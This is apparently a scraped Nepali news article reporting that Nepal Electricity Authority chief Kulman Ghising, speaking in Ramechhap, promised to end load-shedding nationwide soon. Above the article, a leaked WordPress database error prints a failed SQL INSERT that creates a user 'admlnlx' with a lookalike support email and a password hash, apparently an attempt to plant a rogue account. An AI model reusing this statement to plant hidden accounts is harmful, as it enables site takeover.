WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5uYiF7bQIUC8mta/F46SShizAh3wj1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:19:53', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ २१-
नेपाल विद्युत प्रधिकरणका कार्यकारी निर्देशक कुलमान घिसिङले आफूले छिट्टै नै मुलुकभरी नै लोडसेडिङ मुक्त बनाउँने घोषणा गरेका छन् ।
शुक्रबार जिविस रामेछापले आयोजना गरेको कुलमानको स्वागत र जिल्लास्थित सरोकारवालासमेतको अन्र्त्क्रिया कार्यक्रममा उनले छिट्टै नै मुलुकभर लोडसेडिङ हटाउने घोषणा गरेका हुन् ।
मुलुकलाई लोडसेडिङ मुक्त बनाउनका लागि आफू जस्तोसुकै परिस्थितिको सामना गर्न पनि तयार रहेको उनले बताएका छन् । अहिलेसम्मको कामको गतिलाई निरन्तरता दिन सके मुलुकलाई चाँडै नै लोडसेडिङ मुक्त बनाउन सकिने आफूसँग भिजन रहेको उनले बताए ।
अहिले प्राधिकरणले विद्युत चुहावटको कामलाई नियन्त्रण गर्ने अभियान चलाएको भन्दै उनले चुहावटको नियन्त्रणका लागि आफू रातदिन लागि परेको बताए ।
अभियानलाई सफलतामा पु¥याउनका लागि उर्जा मन्त्री र संचालक समिति र प्राधिकरणका कर्मचारी साथीहरुको समेत महत्वपूर्ण भूमिको रहेको बताए । आफू कार्यकारी प्रमुख भएपछि विद्युत चुहावट कम गर्ने अभियानमा लाग्दा चुनौतीको सामना गर्नुपरेको उनले गुनासो गरे । तर कस्तो चुनौती भन्ने उल्लेख गरेनन् ।